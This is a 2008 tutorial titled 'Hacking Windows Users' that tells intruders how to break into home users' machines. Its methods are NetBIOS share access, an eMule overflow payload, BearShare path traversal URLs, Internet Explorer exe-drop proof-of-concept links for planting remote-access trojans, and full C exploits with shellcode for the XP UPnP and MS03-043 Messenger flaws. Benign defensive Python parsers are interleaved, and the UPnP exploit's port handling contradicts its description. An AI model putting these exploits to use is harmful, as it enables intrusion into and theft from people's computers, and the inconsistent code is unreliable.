Monday, July 7, 2008

Hacking Windows Users
Section 1: The Introduction
----------------------------

This tutorial is concentrated on methods of infiltrating home users
using the oh so popular Windows operating system, since these users
tend to be ignorant of the vulnerabilities present on their computer
that can give a potential intruder open doorways into their personal
information. This tutorial will be broken up into different versions
of Windows, as well as different points of entry that are not due
to the operating system itself, but generated by actions of the user
him/herself. So sit back, read, and learn...


Section 2: Netbios
-------------------

There is hardly a soul alive who doesn't know about this problem, and
pretty much everybody and their mother has written a tutorial on
"netbios hacking" (seriously guys, do we really need this many netbios
tutorials circulating around?). Therefore, I will only make a brief
mention of this point of entry purely for the very few of you who may
have not heard of this issue. This problem stems from ignorant
users who enable file sharing on their LAN without setting permissions.
This comes to be, since many users who set up their LAN don't seem to
want to waste their time with having to push in a password every time
they want to get a file off a networked computer. However, what they
don't understand with this is that when they share a computer like
this, they are not only sharing information with other computers on
their LAN, but everybody else on the internet. Therefore, just as
easily as they can access files on their computer, so can the rest
of the world. The way that you, the intruder, would go about exploiting
this example of user ignorance is by first getting a port scanner if
you don't already have one. If you are a Windows user, probably your
best bet is to get IPEye. Though nmap is probably the best port scanner
out there, its Windows port is a tad unstable and not very reliable to
use. IPEye, on the other hand, has all the scan types of nmap, yet is
more robust and dependable than the nmap Windows port. Anyways, upon
port scanning this computer you will be looking for port 139. There
is a scanner called XSharez Scanner that will scan a range of IP
addresses for the presence of this port. This is good to use if you
want to gain access into just anybody's information. Anyways, once you
find the presence of port 139 then you will go into command prompt
(Start/Run/type in "command" and press Enter) and type in "nbtstat
-A ip.address.here" and press Enter. A list will show up with shared
resource names, and the MAC address will be listed at the bottom. If
you see a shared name with <20> beside it, then you know that file
sharing is enabled. You will then go to c:\windows(or winnt)\ and go to
lmhosts and open it with notepad. Then go to the bottom of the file and
type in the victim's ip address, and save. Then go to
Start\Find\Computer and type in the ip address and click "Find Now".
Once the computer shows up you just double click it and you're in.
There are a few other ways to do this same task, but of course, there
are countless "netbios hacking" tutorials out there you can read to
find out about other methods for this task. So this concludes it for
this section, now onto other points of entry that are not quite so
commonly discussed.
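As an added example (not part of the original tutorial), here is a small Python parser for the `nbtstat -A` output described above, written from the auditing side: run it over the output collected for hosts on your own LAN to see which of them advertise the `<20>` File Server service and are therefore exposing shares. The nbtstat output below is constructed in the layout Windows prints, not captured from a real host.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Sample output of "nbtstat -A 192.168.1.5" (constructed for this example).
SAMPLE_NBTSTAT = """\
Local Area Connection:
Node IpAddress: [192.168.1.5] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    HOMEPC         <00>  UNIQUE      Registered
    WORKGROUP      <00>  GROUP       Registered
    HOMEPC         <20>  UNIQUE      Registered
    WORKGROUP      <1E>  GROUP       Registered

    MAC Address = 00-0C-29-AB-CD-EF
"""

# One "NAME <hh> TYPE Status" row of the name table.
NAME_ROW = re.compile(
    r"^\s*(?P<name>\S+)\s+<(?P<suffix>[0-9A-Fa-f]{2})>\s+"
    r"(?P<kind>UNIQUE|GROUP)\s+(?P<status>\w+)\s*$")
MAC_ROW = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")

# NetBIOS name suffixes; <20> is the File Server Service, meaning the
# host is offering file/print shares to whoever can reach port 139.
SUFFIX_MEANING = {
    "00": "Workstation service",
    "03": "Messenger service",
    "20": "File Server service (file sharing enabled)",
    "1E": "Browser service elections",
}

@dataclass
class NbtName:
    name: str
    suffix: str   # two hex digits, upper case
    kind: str     # UNIQUE or GROUP
    status: str

def parse_nbtstat(output: str) -> tuple[list[NbtName], str | None]:
    """Parse nbtstat -A output into name records plus the MAC address."""
    names, mac = [], None
    for line in output.splitlines():
        m = NAME_ROW.match(line)
        if m:
            names.append(NbtName(m["name"], m["suffix"].upper(),
                                 m["kind"], m["status"]))
            continue
        m = MAC_ROW.search(line)
        if m:
            mac = m.group(1).upper()
    return names, mac

def exposed_file_servers(output: str) -> list[str]:
    """Names registered with the <20> suffix: these hosts serve shares."""
    names, _ = parse_nbtstat(output)
    return sorted({n.name for n in names
                   if n.suffix == "20" and n.kind == "UNIQUE"})

def report(output: str) -> str:
    """Human-readable exposure summary for one host's nbtstat output."""
    names, mac = parse_nbtstat(output)
    lines = [f"MAC: {mac or 'unknown'}"]
    for n in names:
        meaning = SUFFIX_MEANING.get(n.suffix, "other")
        lines.append(f"{n.name:<16}<{n.suffix}> {n.kind:<7} {meaning}")
    if exposed_file_servers(output):
        lines.append("WARNING: file sharing advertised; check share permissions")
    return "\n".join(lines)

if __name__ == "__main__":
    print(report(SAMPLE_NBTSTAT))
```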


Section 3: Peer-to-Peer File Sharing Clients
---------------------------------------------

Since the days of Napster, p2p file sharing has become quite the
craze, bringing piracy to the average household. With the click
of the mouse your average user can download games, movies, music, and
anything else under the sun without paying a penny, just as easily as
surfing the web. However, what many users of such clients don't realize
is that they have much more to worry about with using such services
than just the RIAA. Many of these clients are not so securely put
together, leaving an open gateway for intrusion. One example of a
troublesome client is eMule. eMule versions 0.42a-d and earlier are
vulnerable to a buffer overflow flaw in the eMule web server enabled
for file sharing that could allow you, the intruder, to gain remote
access to the remote computer. Though the latest version of eMule
fixes this issue, there are probably still quite a few users out there
who have not chosen to update. Below is a script you can use to check
for the presence of this troublesome server....

script_description(english:desc["english"]);

summary["english"] = "Detect eMule Web Server";
script_summary(english:summary["english"]);

script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2004 A.Kaverin");
family["english"] = "Peer-To-Peer File Sharing";
script_family(english:family["english"]);
script_dependencies("find_service.nes");
script_require_ports(4711);
exit(0);
}


include("http_func.inc");

port = 4711;

if(! get_port_state(port)) exit(0);
banner = get_http_banner(port);
if ( banner && "eMule" >< banner )
{
security_warning(port);
}

exit(0);

If the presence of this server is found, then you can use the
following script provided to exploit this service...

/MIRCAlias { .quote PRIVMSG $1
$+(:,$chr(1),SENDLINK|, 90909090909090909090909090909090909090909090909090909090909
09090909090909090909090909090909090909090909090909090909090
9090909090909090909090909090909090EB0790907AF65700906681EC4
00031C96820210000684D756C656875722065686820796F685061746389E
2515152513EFF15C0E76100503EFF1568E46100909090909090909090909
090909090909090909090909090909090909090909090909090
9090909090909090909090909090909090909090909090909090,|,$chr(1))

Keep in mind, these are both mIRC scripts, so you would exploit them
via the irc service provided on eMule. The "MIRCAlias" above is
whatever alias you are going under at the time. The script listed above
exploits the DecodeBase16 buffer within the server to allow you to run
arbitrary commands on the remote computer, that is, if they are using
a vulnerable version. Another p2p client that we can use to our
advantage is BearShare, which is vulnerable with version 2.2.2 and
earlier. This exploit only works under the 9x/ME operating systems
however. Anyways, how we would exploit this is by opening up our
internet browser and typing in http://[victim]:6346/........../windows/win.ini or basically any
file we want to gain access to. This is because 2.2.2 and earlier
versions of BearShare don't seem to sanitize user input. This allows
any outside intruder (such as yourself perhaps) to use traversal
style attacks to access files on the remote computer. Also, another
great thing is even if none of these vulnerabilities are applicable,
most file sharing clients use http to host files from one user to
another. Therefore, you can simply start a transfer with another
user, then go to command prompt (Start/Run/type in "command" and press
Enter), and type in "netstat -n" and once again press Enter. Now, while
any sensible user will be careful about what he or she shares, there are
still a lot of users who don't seem to get this idea. Therefore, an
all too commonly made mistake for users to make is to share their
entire c: drive. In this case, the user him/herself has literally left
the door open for you to walk right in. All you have to do is open up
your internet browser and type in http://ip.address.here:[port # here].
Below is a list of default ports for different p2p services you can
use when using netstat for this purpose...

Gnutella: 6345, 6346, 6347, 6348, 6349
eDonkey: 4661, 4662, 4665
Kazaa: 80, 1214

Of course, http hosting does not hold true for all p2p clients, but
you can try your luck. Anyways, that concludes it for this section, so
onto the next section.
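The BearShare traversal above is the classic case of an HTTP file server that joins the request path onto its share directory without checking where the result lands. Below, as an added example (not BearShare's code or the tutorial's), is that vulnerable pattern next to a hardened resolver; the share root and request paths are hypothetical.

```python
from __future__ import annotations
import posixpath
from urllib.parse import unquote

SHARE_ROOT = "/srv/p2p/shared"   # hypothetical share directory

def vulnerable_resolve(root: str, request_path: str) -> str:
    """The bug pattern: glue the URL path onto the root and trust it.
    '../' segments walk straight out of the share directory, so a request
    for ../../../windows/win.ini reads a file the user never shared."""
    return posixpath.normpath(root + "/" + unquote(request_path))

def safe_resolve(root: str, request_path: str) -> str | None:
    """Return the file under root that request_path names, or None if the
    request would escape the share directory."""
    root = posixpath.normpath(root)
    # Decode percent-encoding first: an encoded %2e%2e/ is still '../'.
    path = unquote(request_path)
    # Windows clients may send backslashes; treat them as separators.
    path = path.replace("\\", "/")
    # A leading '/' means "relative to the share", never the filesystem root.
    path = path.lstrip("/")
    # NUL bytes can truncate the path inside a C-based server; refuse them.
    if "\x00" in path:
        return None
    full = posixpath.normpath(posixpath.join(root, path))
    # The resolved path must be the root itself or sit strictly below it.
    if full != root and not full.startswith(root + "/"):
        return None
    return full

if __name__ == "__main__":
    for req in ("music/song.mp3", "../../../windows/win.ini",
                "..%2f..%2f..%2fwindows/win.ini", "........../windows/win.ini"):
        print(f"{req:<36} vulnerable -> {vulnerable_resolve(SHARE_ROOT, req)}")
        print(f"{'':<36} hardened   -> {safe_resolve(SHARE_ROOT, req)}")
```

Note that the tutorial's `........../` form resolves to a plain (non-existent) directory name under the share in the hardened version, which is exactly what should happen: an unknown file, not a file outside the share.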


Section 4: Internet Explorer
----------------------------

In these times, using Internet Explorer as your default browser is
a very bad decision to make. There are so many vulnerabilities for
Internet Explorer right now, that using it is like leaving the door
wide open for anybody to just walk in. Even CERT (Computer Emergency
Readiness Team) has finally warned everybody to not use Internet
Explorer. However, does your average end user even listen? Not hardly.
Therefore, this issue remains a very common point of entry into your
average Windows home user. The task in exploiting Internet Explorer
is to trick it into dropping an executable onto the remote computer
so that we can run our favorite RAT server and set up a backdoor onto
the user's computer. First we can try exploiting it via object tags.
Go to the below link to get a proof of concept for this vulnerability.

http://www.geocities.com/protonigg3r/ie6-exedrop-asp-POC.zip

Just incorporate this vulnerability into your own web page, and then
add perhaps a cgi ip logger or such so that you can log the ip address
of the visitor so that you can connect to the server, and then when
they visit the page, just load up your RAT client and connect to the
newly established server (note: RAT means Remote Administration Tool,
trojan in layman's terms). Of course, maybe there is the off chance
that the user you are targeting has patched up this problem. In this
case, you can use a more recent vulnerability of this type. Go to the
below link to get a full report on this vulnerability...

http://62.131.86.111/analysis.htm

Or if you want to get straight to the point, you can find the proof
of concept to utilize at the below link...

http://62.131.86.111/security/idiots/repro/exploit.zip

Of course, this vulnerability is only as effective as the RAT you
choose is. If you use an obvious one like Sub7 then you will probably
not be successful. Even if the user you are targeting does not have
antivirus software installed, most ISPs block commonly used trojan
ports to thwart such activity. I cannot choose a RAT for you. This
will be up to you, and will like many things in this sort of field of
activity be a trial and error process. Well that pretty much wraps it
up for this section. No matter how many security warnings are released
to the public, most people just don't listen. Therefore, this can be
a highly effective point of entry into someone's personal computer.
Now, onto our next section...


Section 5: Windows
-------------------

Of course, applications and configurations used aren't the only source
of such vulnerabilities. Windows itself can be a point of entry if
not properly patched. First let's get into the DCOM vulnerability.
The Distributed Component Object Model service is a default service
on Windows NT, 2000, XP, and 2003 that allows for COM objects to
communicate over a network. This service can be exploited to allow
arbitrary (remote) commands to be executed on the remote side. This
is the vulnerability that MyDoom used to distribute itself, so many
computers are already patched from this issue. However, there are
plenty that are not, so it's always nice to check. If you have a
specific user in mind, then you can use the following tool to check
if the user is vulnerable, and exploit the service if it is
vulnerable...

www.geocities.com/protonigg3r/rpcexploit.zip

You can also use the tool linked below to scan a range of ip addresses
for the presence of this vulnerability...

http://www.eeye.com/html/Research/Tools/RPCDCOM.html

Now let's discuss another vulnerability that affects Windows XP. The
UPnP (Universal Plug n' Play) service runs by default on Windows
XP, and is used to establish seamless p2p networking between
disparate devices over a network. The idea to set this by default on
Windows XP was a huge mistake (typical Microsoft follies as usual).
To exploit this feature, we can use the below code...

/*

***************** EXPLOIT CODED BY JOCANOR *****************


this is a new and functional exploit for de vulnerability
affects to windows xp, at the service UPNP, port 5000.

this exploit is a part of ASQ12 project, same as XPhack.c coded
also be me...

you only type:

argoxp victimip

and later, in another cmd type:

nc victimip 1981

note:

you need netcat.

note2:

this exploit affects to windows xp + sp0 english version.

***************** EXPLOIT CODED BY ATLANTIS DUDE *****************

*/
#include
#include

#pragma comment(lib, "ws2_32")

char shell[] = //bind port 1981
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x66\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x70\x99\x98\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85"
"\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A"
"\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A"
"\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC"
"\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58"
"\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12"
"\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71"
"\xE5\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3"
"\x9D\xC0\x71\xF0\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66"
"\xCE\x69\x12\x41\x5E\x9E\x9B\x99\x9E\x24\xAA\x59\x10\xDE\x9D\xF3"
"\x89\xCE\xCA\x66\xCE\x6D\xF3\x98\xCA\x66\xCE\x61\xC9\xC9\xCA\x66"
"\xCE\x65\x1A\x75\xDD\x12\x6D\xAA\x42\xF3\x89\xC0\x10\x85\x17\x7B"
"\x62\x10\xDF\xA1\x10\xDF\xA5\x10\xDF\xD9\x5E\xDF\xB5\x98\x98\x99"
"\x99\x14\xDE\x89\xC9\xCF\xCA\xCA\xCA\xF3\x98\xCA\xCA\x5E\xDE\xA5"
"\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xCA\x66\xCE\x7D\xC9\x66\xCE\x71"
"\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32"
"\x7B\x77\xAA\x59\x5A\x71\x62\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6"
"\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9"
"\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA"
"\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8"
"\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC"
"\xED\xD8\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8"
"\xFA\xFA\xFC\xE9\xED\x99";


int main(int argc, char *argv[])

{

char recvbuf[1600];
char szRequest[2048];
char szJmpCode[281];
char szExeCode[840];
int i;
WSADATA wsa;
struct hostent *he;
struct sockaddr_in their_addr;
int len, sockfd;
short dport = 445;


printf("\n ArgoXP 1.0 beta \n");
printf(" ExPlOiT CoDeD By: JoCaNoR \n");
printf("Member of: SlackTeam...Jocanor, nkde, zet4 & zerok\n");
printf(" .-.-.Especial thanks to Neo_geno & Lide.-.-.\n\n");

if (argc < 2)
{
printf("How to use: ");
printf("Argoxp \n\n");
exit(0);
}


for(i=0; i<268; i++) szJmpCode[i]=(char)0x90;

szJmpCode[268]=(char)0x4D; szJmpCode[269]=(char)0x3F;
szJmpCode[270]=(char)0xE3; szJmpCode[271]=(char)0x77;
szJmpCode[272]=(char)0x90; szJmpCode[273]=(char)0x90;
szJmpCode[274]=(char)0x90; szJmpCode[275]=(char)0x90;


szJmpCode[276]=(char)0xFF; szJmpCode[277]=(char)0x63;
szJmpCode[278]=(char)0x64; szJmpCode[279]=(char)0x90;
szJmpCode[280]=(char)0x00;

for(i=0; i<32; i++) szExeCode[i]=(char)0x90;
szExeCode[32]=(char)0x00;

strcat(szExeCode, shell);
sprintf(szRequest, "%s%s\r\n\r\n", szJmpCode, szExeCode);

WSAStartup(MAKEWORD(2,0),&wsa);

if ((he=gethostbyname(argv[1])) == NULL)
{
perror("Unable to resolve");
exit(1);
}

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket error");
exit(1);
}

their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(dport);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);

printf("Waiting for connection...");
if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
{
printf("\nError, unable to connect!!!");
exit(1);
}

printf("Connected!!!\n");

if (send(sockfd, shell, sizeof(shell)-1, 0) == -1)
{
printf("Error :(:(:(\n");
exit(1);
}

printf("OoOoOps shell!!\n");
len = recv(sockfd, recvbuf, 1600, 0);

return 0;

}

//***************** EXPLOIT CODED BY ATLANTIS DUDE *****************

Of course, this vulnerability is not quite as common as it was at the
time when it was first reported to the security forums (which was
somewhere around 2001 I believe), but it can still be found on plenty
of computers on the internet. Still, it's much better to work with a
more recent vulnerability. The HSC (Help and Support Center) service
is provided on Windows to help on a wide variety of topics. This
service is installed by default on XP and Server 2003. It is vulnerable
to an argument injection vulnerability that can allow you, as an
attacker, to take control of the remote side. There are quite a few
proofs of concept at the below link that you can use to exploit this
service...

http://seclists.org/lists/bugtraq/2004/Mar/0307.html

Another service we can exploit is the Windows Messenger service, which
is a feature on most versions of Windows. With users running NT, XP,
2000, or Server 2003, this service can be exploited to gain remote
access. If you are looking for just any user that is exploitable
through this service, then once again we can rely on eEye to provide
us with a tool that we can use to scan a range of ip addresses for
the presence of this vulnerability, which you can find at the below
link...

http://www.eeye.com/html/Research/Tools/MSGSVC.html

Once such a vulnerable target is found, or if we already have our
target in mind, then we can use the below code to exploit this
feature...

/*******************************************************************/
/* [Crpt] MS03-043 - Messenger exploit by MrNice [Crpt] */
/* --------------------------------------------------------------- */
/* */
/* This Sploit use the unhandledexceptionfilter to redirect */
/* the execution. When overflow occur we have : */
/* */
/* mov eax,esi+8 */
/* mov ecx,esi+Ch */
/* mov dword ptr ds:[ecx],eax */
/* */
/* so we control ecx and edx and we can write 4 bytes */
/* where we want. */
/* If we try to write in a not writable memory zone, an */
/* exception is launched and unhandledexceptionfilter too. */
/* */
/* A part of unhandledexceptionfilter : */
/* */
/* mov eax, dword_0_77ECF44C(=where) */
/* cmp eax, ebx */
/* jz short loc_0_77EA734C */
/* push esi */
/* call eax */
/* */
/* So we write the "WHAT"(=jmp esi+4Ch) at */
/* the "WHERE"(=77EA734C here) and when the exception occur */
/* the unhandledexceptionfilter is launched so when call eax */
/* occur, it execute our code. */
/* */
/* Thx Kotik who coded the proof of concept,and Metasploit */
/* for Shellcode and last but not least kralor,Scurt from Crpt */
/* */
/* Tested on win2k FR SP0 */
/* */
/* */
/*******************************************************************/

#ifdef _WIN32
#include
#include
#pragma comment (lib,"ws2_32")
#else
#include
#include
#include
#include
#include
#include
#include
#include
#include
#endif
static unsigned char packet_header[] =
"\x04\x00\x28\x00"
"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
"\x4f\xb6\xe6\xfc"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\x00\x00";


unsigned char field_header[] =
"\xff\xff\xff\xff"
"\x00\x00\x00\x00"
"\xff\xff\xff\xff";

unsigned char ShellCode[] = // XorDecode 23 bytes
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3E\x01\x80\x34\x0A\x96\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
// AddUser:X Pass:X
"\xf0\x17\x7a\x16\x96\x1f\x70\x7e\x21\x96\x96\x96\x1f\x90\x1f\x55"
"\xc5\xfe\xe8\x4e\x74\xe5\x7e\x2b\x96\x96\x96\x1f\xd0\x9a\xc5\xfe"
"\x18\xd8\x98\x7a\x7e\x39\x96\x96\x96\x1f\xd0\x9e\xa7\x4d\xc5\xfe"
"\xe6\xff\xa5\xa4\xfe\xf8\xf3\xe2\xf7\xc2\x69\x46\x1f\xd0\x92\x1f"
"\x55\xc5\xfe\xc8\x49\xea\x5b\x7e\x1a\x96\x96\x96\x1f\xd0\x86\xc5"
"\xfe\x41\xab\x9a\x55\x7e\xe8\x96\x96\x96\x1f\xd0\x82\xa7\x56\xa7"
"\x4d\xd5\xc6\xfe\xe4\x96\xe5\x96\xfe\xe2\x96\xf9\x96\xfe\xe4\x96"
"\xf7\x96\xfe\xe5\x96\xe2\x96\xfe\xf8\x96\xff\x96\xfe\xfb\x96\xff"
"\x96\xfe\xd7\x96\xf2\x96\x1f\xf0\x8a\xc6\xfe\xce\x96\x96\x96\x1f"
"\x77\x1f\xd8\x8e\xfe\x96\x96\xca\x96\xc6\xc5\xc6\xc6\xc5\xc6\xc7"
"\xc7\x1f\x77\xc6\xc2\xc7\xc5\xc6\x69\xc0\x86\x1d\xd8\x8e\xdf\xdf"
"\xc7\x1f\x77\xfc\x97\xc7\xfc\x95\x69\xe0\x8a\xfc\x96\x69\xc0\x82"
"\x69\xc0\x9a\xc0\xfc\xa6\xcf\xf2\x1d\x97\x1d\xd6\x9a\x1d\xe6\x8a"
"\x3b\x1d\xd6\x9e\xc8\x54\x92\x96\xc5\xc3\xc0\xc1\x1d\xfa\xb2\x8e"
"\x1d\xd3\xaa\x1d\xc2\x93\xee\x97\x7c\x1d\xdc\x8e\x1d\xcc\xb6\x97"
"\x7d\x75\xa4\xdf\x1d\xa2\x1d\x97\x78\xa7\x69\x6a\xa7\x56\x3a\xae"
"\x76\xe2\x91\x57\x59\x9b\x97\x51\x7d\x64\xad\xea\xb2\x82\xe3\x77"
"\x1d\xcc\xb2\x97\x7d\xf0\x1d\x9a\xdd\x1d\xcc\x8a\x97\x7d\x1d\x92"
"\x1d\x97\x7e\x7d\x94\xa7\x56\x1f\x7c\xc9\xc8\xcb\xcd\x54\x9e\x96";


int main(int argc,char *argv[])
{
int i, packet_size, fields_size, s,sp;
unsigned char packet[8192];
struct sockaddr_in addr;
// A few conditions :
// 0 <= strlen(from) + strlen(machine) <= 56
// max fields size 3992
char from[] = "RECCA";
char machine[] = "ZEUS";
char body[4096] = "*** MESSAGE ***";
#ifdef _WIN32
WSADATA wsaData;
#endif

if(argc<2)
{
printf("\t [Crpt] MS03-043 - Messenger exploit by MrNice [Crpt]\n");
printf("\t\t www.coromputer.net && Undernet #coromputer\n");
printf("---------------------------------------------------------------\n");
printf("Tested on Windows 2000 French Sp0\n\n");
printf("Downloaded from www.K-OTik.com\n");
printf("Syntax : %s \n",argv[0]);
return -1;
}

#ifdef _WIN32
if(WSAStartup(0x101,&wsaData)) {
printf("error: unable to load winsock.\n");
return -1;
}
#endif

memset(&addr,0x00,sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(argv[1]);
addr.sin_port = htons(135);

memset(packet,0x00,sizeof(packet));
packet_size = 0;

memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1);
packet_size += sizeof(packet_header) - 1;

i = strlen(from) + 1;
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
strcpy(&packet[packet_size], from);
packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

i = strlen(machine) + 1;
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
strcpy(&packet[packet_size], machine);
packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

printf("Max 'body' size (incl. terminal NULL char) = %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header));
memset(body, 0x14, sizeof(body));


body[2263]=(char)0x90;
body[2264]=(char)0x90;
body[2265]=(char)0x90;
body[2266]=(char)0x90;

body[2267]=(char)0x90;
body[2268]=(char)0x90;

//jmp 8 bytes plus loing
body[2269]=(char)0xeb;
body[2270]=(char)0x08;

//WHAT CRYPTSVC.dll Win2k sp0 FRENCH
body[2271]=(char)0x48;
body[2272]=(char)0x65;
body[2273]=(char)0x87;
body[2274]=(char)0x76;

//WHERE win2k sp0 FRENCH
body[2275]=(char)0x4C;
body[2276]=(char)0xF4;
body[2277]=(char)0xEC;
body[2278]=(char)0x77;

for(i=2279;i<2606;i++)
body[i]=ShellCode[i-2279];

body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0';

i = strlen(body) + 1;
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
strcpy(&packet[packet_size], body);
packet_size += i;

fields_size = packet_size - (sizeof(packet_header) - 1);
*(unsigned int *)(&packet[40]) = time(NULL);
*(unsigned int *)(&packet[74]) = fields_size;

printf("Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from)
+ strlen(machine) + strlen(body), packet_size, fields_size);


if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
printf("error: unable to create socket\n");
return -1;
}

if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
printf("error: unable to send packet\n");
return -1;
}
return 0;
}

Well that concludes it for this section. There are plenty more
vulnerabilities that have been reported and released for different
versions of Windows, but the vulnerabilities that I explained are
the most recent of them. Therefore, these are the only ones that
really need any attention.
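The tutorial leans on netstat twice: in Section 3 to learn which port a p2p client serves files on, and implicitly throughout this section, since DCOM, UPnP and the Messenger service each listen on a well-known port. As an added example (not from the original tutorial), this Python script turns that around for the defender: it parses `netstat -an` output taken on the Windows machine itself and lists which of the ports this tutorial mentions are open to the network rather than bound to loopback. The netstat output is constructed, and the port table is limited to ports named in the text plus TCP 445, which is the port the UPnP exploit's source above actually connects to (`dport = 445`).

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Sample "netstat -an" output from a Windows XP box (constructed for this
# example, in the column layout Windows prints).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5000           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1025         0.0.0.0:0              LISTENING
  TCP    192.168.1.5:139        0.0.0.0:0              LISTENING
  TCP    192.168.1.5:4662       0.0.0.0:0              LISTENING
  TCP    192.168.1.5:4662       203.0.113.7:51022      ESTABLISHED
  UDP    0.0.0.0:135            *:*
  UDP    192.168.1.5:137        *:*
"""

# Ports discussed in this tutorial and the service behind each one.
WATCHED_PORTS = {
    ("TCP", 139): "NetBIOS session: file sharing (Section 2)",
    ("TCP", 135): "RPC endpoint mapper: DCOM (Section 5)",
    ("UDP", 135): "Messenger service datagrams (Section 5)",
    ("TCP", 445): "SMB over TCP (port the UPnP exploit connects to)",
    ("TCP", 5000): "UPnP on Windows XP (Section 5)",
    ("TCP", 4711): "eMule web server (Section 3)",
    ("TCP", 1214): "Kazaa (Section 3)",
    **{("TCP", p): "Gnutella (Section 3)" for p in range(6345, 6350)},
    **{("TCP", p): "eDonkey (Section 3)" for p in (4661, 4662, 4665)},
}

ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)\s*(\S+)?\s*$")

@dataclass(frozen=True)
class Socket:
    proto: str
    local_addr: str
    port: int
    state: str   # LISTENING, ESTABLISHED, ... or "" for UDP rows

def parse_netstat(output: str) -> list[Socket]:
    """Parse the TCP/UDP rows of Windows netstat -an output."""
    socks = []
    for line in output.splitlines():
        m = ROW.match(line)
        if m:
            proto, addr, port, _remote, state = m.groups()
            socks.append(Socket(proto, addr, int(port), state or ""))
    return socks

def network_exposed(output: str) -> list[tuple[Socket, str]]:
    """Watched ports reachable from the network: loopback-only binds are
    not exposed, and established TCP flows are not listeners."""
    found = []
    for s in parse_netstat(output):
        if s.local_addr.startswith("127."):
            continue
        if s.proto == "TCP" and s.state != "LISTENING":
            continue
        label = WATCHED_PORTS.get((s.proto, s.port))
        if label:
            found.append((s, label))
    return found

if __name__ == "__main__":
    for s, label in network_exposed(SAMPLE_NETSTAT):
        print(f"{s.proto} {s.local_addr}:{s.port:<5} {label}")
```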


Section 6: Conclusion
----------------------

If you yourself are a Windows user, and any of this seems to bring
a chill up your spine, then I suggest consulting securityfocus.com
to learn how to secure your computer from such attacks. Another thing
I must note, for those who would not otherwise realize it: the code
listed in the "Windows" section is C source code, so you need a C
compiler in order to build it. If you have a Linux distribution
handy, then you already have a compiler you can use. Otherwise, there
are a few Windows C compilers you can use as well. Anyways, I hope
this tutorial has educated you, as well as made you more security
aware.
